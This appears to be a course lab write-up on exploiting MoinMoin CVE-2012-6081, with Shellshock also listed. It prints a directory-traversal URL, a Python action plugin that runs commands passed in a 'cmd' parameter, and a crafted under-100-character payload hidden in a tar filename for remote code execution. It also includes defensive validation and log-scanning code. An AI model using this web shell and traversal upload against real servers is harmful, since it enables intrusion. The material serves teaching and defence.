Exploits

CVE-2014-6271/Shellshock

This exercise covers the exploitation of a Bash vulnerability through a CGI.

CVE-2012-6081: MoinMoin code execution

This exercise explains how you can exploit CVE-2012-6081 to gain code execution. This vulnerability was exploited to compromise Debian's wiki and the Python documentation website.

MoinMoin

  • Vulnerabilities: directory traversal and unrestricted file upload

  • Directory traversal bug:

    http://172.16.230.168/moin/secretuser?action=twikidraw&do=modify&target=../../../../../../../../../data/plugin/action/moinexec.py

    Opening the drawing app with this URL and then saving shows that the target file is moinexec.py, meaning we can write to the file moinexec.py on the server. This would be our backdoor for code execution.

  • Code execution: MoinMoin supports custom action plugins, which are Python files that get executed. If we create a file in /var/lib/moin/mywiki/data/plugin/action/ and name it test.py, we can call it by going to http://vulnerable/moin/WikiSandBox?action=test&cmd=uname%20-a

    import os
    def execute(pagename, request):
      # run the command supplied in the cmd parameter and return its output
      stream = os.popen(request.values['cmd'])
      request.write(stream.read())
  • Unrestricted file upload: the drawings are saved as a tar file at the specified location. In order to get code execution we need that file to contain valid Python code. The only part of it we control is the filename, so the payload has to go there. The tar specification limits filenames to 100 characters.

  • To create a plugin we need to craft the code so that it looks like a filename extension, e.g. drawing[.payload]. The attacker uses a ternary if/else whose condition always evaluates to false, so the drawing.z expression is skipped and never evaluated:

    drawing.z if()else()
    import os
    def execute(pagename, request):
      stream = os.popen(request.values['cmd'])
      request.write(stream.read())

    But the payload can't contain any more "." characters, since otherwise only the code after the last "." will be evaluated, and we also need to keep the number of characters under 100. The shortened payload:

    drawing.z if()else()
    import os
    def execute(p,r):exec"print>>r,os\56popen(r\56values['c'])\56read()"

    (\56 is the octal escape for ".", so the dots only appear once the string is evaluated by exec.)

    After shortening, the payload has the required properties: it is valid Python code; it starts with drawing.; it contains def execute(p,r):; it contains no other dot (.); and it is less than 100 characters (due to the tar format).
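The directory traversal bullet above shows a target parameter walking out of the drawing directory into data/plugin/action/. As an added example, not part of the exercise and not MoinMoin's own code, the Python below shows the check a hardened save handler would apply to that parameter (allow-list the drawing name, then confirm the resolved path still sits under the page directory) and runs the same check over a few constructed access-log lines to flag earlier attempts. The page directory layout, the log lines and the client IP are assumptions.

```python
import os
import re
from urllib.parse import parse_qs, urlsplit

# Assumption (not MoinMoin's own rule): a drawing name is a bare identifier, so
# anything containing "/", "\\" or "." is refused before the filesystem is touched.
SAFE_DRAWING_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def resolve_drawing_target(page_dir, target):
    """Map the user-supplied `target` to a path inside page_dir.

    Returns the absolute path, or None if the value is not a plain drawing
    name or would resolve outside page_dir (e.g. target=../../../data/plugin/...).
    """
    if not SAFE_DRAWING_NAME.match(target):
        return None
    base = os.path.realpath(page_dir)
    candidate = os.path.realpath(os.path.join(base, target))
    # Containment check as a second line of defence should the allow-list
    # ever be relaxed: the resolved path must still be under base.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


# Constructed Apache-style access log lines modelled on the request shown on
# this page; client IP, timestamps and response sizes are made up.
SAMPLE_LOG = [
    '172.16.230.1 - - [01/Jan/2014:12:00:00 +0000] "GET /moin/secretuser?action=twikidraw&do=modify&target=mydrawing HTTP/1.1" 200 512',
    '172.16.230.1 - - [01/Jan/2014:12:00:05 +0000] "GET /moin/secretuser?action=twikidraw&do=modify&target=../../../../../../../../../data/plugin/action/moinexec.py HTTP/1.1" 200 512',
    '172.16.230.1 - - [01/Jan/2014:12:00:09 +0000] "GET /moin/WikiSandBox?action=show HTTP/1.1" 200 4096',
]

REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def scan_access_log(lines, page_dir="/var/lib/moin/mywiki/data/pages"):
    """Return (line_no, target) for every twikidraw request whose target escapes page_dir.

    page_dir is an assumed location for per-page drawing storage.
    """
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        # parse_qs percent-decodes, so an encoded %2e%2e/ is caught as well.
        qs = parse_qs(urlsplit(m.group(1)).query)
        if qs.get("action", [""])[0] != "twikidraw":
            continue
        for target in qs.get("target", []):
            if resolve_drawing_target(page_dir, target) is None:
                hits.append((n, target))
    return hits


if __name__ == "__main__":
    for n, target in scan_access_log(SAMPLE_LOG):
        print("line %d: twikidraw target escapes the page directory: %r" % (n, target))
```

The allow-list alone already rejects the traversal; the realpath containment check is kept so that the handler stays safe even if the name rule is later loosened to permit subdirectories.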

You need to be logged in to upload the plugin file.

For security reasons, the Java applet cannot be run in Chrome or Firefox. Only Safari worked for me after I whitelisted the server in the Java Control Panel. This is only needed for the demo.
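The unrestricted file upload bullets above rely on two facts about the saved archive: the member name is the very first thing in the file (the 100-byte name field of the first tar header), and the USTAR format refuses longer names. As an added example, not part of the exercise and not MoinMoin's own code, the Python below demonstrates both with the standard tarfile module and shows the check a hardened save handler could run before writing an uploaded drawing archive to disk: every member must be a regular file with a plain drawing name. The expected member names (drawing.draw, drawing.map, drawing.png) and the sample archives are assumptions.

```python
import io
import re
import tarfile

# Assumption (not MoinMoin's own rule): a twikidraw archive holds only regular
# files with plain names such as drawing.draw / drawing.map / drawing.png.
ALLOWED_MEMBER = re.compile(r"^[A-Za-z0-9_-]{1,50}\.(draw|map|png)$")


def build_tar(members):
    """Build an in-memory USTAR archive from {name: bytes}; used for constructed test data."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.USTAR_FORMAT) as tf:
        for name, data in members.items():
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def first_name_field(tar_bytes):
    """The first 100 bytes of a tar archive are the name field of the first header."""
    return tar_bytes[:100].rstrip(b"\0").decode("utf-8", "replace")


def name_fits_ustar(name):
    """True if `name` fits the 100-byte USTAR name field (the limit the text refers to)."""
    try:
        build_tar({name: b""})
        return True
    except ValueError:  # tarfile raises "name is too long" for USTAR
        return False


def check_drawing_archive(tar_bytes):
    """Return (accepted, reasons); reject any member that is not a plainly named regular file."""
    reasons = []
    try:
        with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:") as tf:
            for m in tf.getmembers():
                if not m.isfile():
                    reasons.append("non-regular member %r" % m.name)
                elif not ALLOWED_MEMBER.match(m.name):
                    reasons.append("unexpected member name %r" % m.name)
    except tarfile.TarError as exc:
        reasons.append("unreadable archive: %s" % exc)
    return (not reasons, reasons)


# Constructed samples: a well-formed save, and one whose member name has the
# shape of the payload discussed above (newline-separated Python source).
GOOD_ARCHIVE = build_tar({"drawing.draw": b"<drawing/>", "drawing.png": b"\x89PNG"})
BAD_ARCHIVE = build_tar({"drawing.z if()else()\nimport os": b""})

if __name__ == "__main__":
    print("first name field of good archive:", first_name_field(GOOD_ARCHIVE))
    print("good archive accepted:", check_drawing_archive(GOOD_ARCHIVE))
    print("bad archive accepted:", check_drawing_archive(BAD_ARCHIVE))
    print("100-char name fits:", name_fits_ustar("a" * 100), "101-char:", name_fits_ustar("a" * 101))
```

Because the validation works on the parsed member list rather than on the raw bytes, it catches a crafted name regardless of where in the archive it appears; the name-field helper is there only to make the layout the text describes visible.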

http://www.thefengs.com/wuchang/courses/cs410/FinalProject.txt

Contributors

shaynewang
